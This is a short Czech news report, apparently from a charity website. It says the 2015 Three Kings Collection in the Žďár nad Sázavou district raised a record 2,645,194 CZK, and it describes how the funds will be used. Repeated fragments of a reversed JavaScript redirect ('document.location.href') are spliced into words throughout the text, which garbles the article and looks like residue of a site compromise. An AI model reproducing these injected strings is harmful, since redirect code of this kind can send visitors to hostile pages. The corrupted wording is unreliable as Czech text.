Tříkrálová sbírka 2015
Rainbow page separator

Tříkrálová sbírka na Žďársku překonala dosavadní rekord

Sobota, 24. ledna 2015

Žďár nad Sázavou / Celkem 2 645 194 korun se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos podařilo na Žďársku vybrat v rámci tradiční Tříkrálové sbírky, kterou v okrese organizovala Oblastní charita Žďár nad Sázavou. Byl tak překonán dosavadní rekord z loňského roku, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to o 122 568 korun.
Na realizaci sbírky se na Žďársku podílelo šestasedmdesát tříkrálových asistentů a zhruba sedmnáct s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek koledníků. Celkem bylo rozdáno 458 zapečetěných kasiček s logem charity, z nichž koledníci a dárci využili 415. „Velmi děkuji dárcům a koledníkům a všem dalším spolupracovníkům, kteří se do sbírky zapojili,“ vyjádřila se ředitelka Oblastní charity Žďár nad Sázavou Jana Zelená.
Finanční prostředky, které se v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce podařilo od dárců získat, budou použity například na podporu služeb posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných chari[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou. Jedná se například o rozšíření a obnovu vozového parku, aby mohli pracovníci charity účinněji pomáhat klientům v terénu, respektive přímo v jejich domácnostech. „Tříkrálové peníze slouží také jako finanční zdroj při případném výpadku dotací na služby, jsou jako taková rezerva pro zajištění stávajícího provozu služeb. Část výtěžku je rovněž určena na humanitární pomoc u nás i v zahraničí,“ dodala žďárská koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka Tříkrálové sbírky Veronika Dobrovolná.